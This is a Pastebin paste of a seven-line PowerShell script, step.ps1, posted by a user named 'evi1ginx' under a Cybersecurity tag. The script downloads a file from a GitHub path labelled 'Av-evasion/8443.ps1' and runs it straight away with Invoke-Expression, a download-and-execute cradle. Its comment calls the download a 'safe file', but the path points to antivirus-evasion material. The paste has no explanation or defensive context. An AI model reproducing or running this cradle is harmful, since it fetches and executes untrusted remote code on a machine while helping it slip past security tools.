Advertisement
evi1ginx

step.ps1

May 9th, 2024
608
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.37 KB | Cybersecurity | 0 0
  1. ๏ปฟ# URL to download safe file
  2. $scriptUrl = "https://github.com/salahgeek/LAB/blob/main/LAS/Av-evasion/8443.ps1"
  3. # Download script
  4. $scriptBytes = Invoke-WebRequest -Uri $scriptUrl -UseBasicParsing -Method Get -MaximumRedirection 0
  5. $scriptContent = [System.Text.Encoding]::UTF8.GetString($scriptBytes.Content)
  6. # Run the script
  7. Invoke-Expression -Command $scriptContent
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement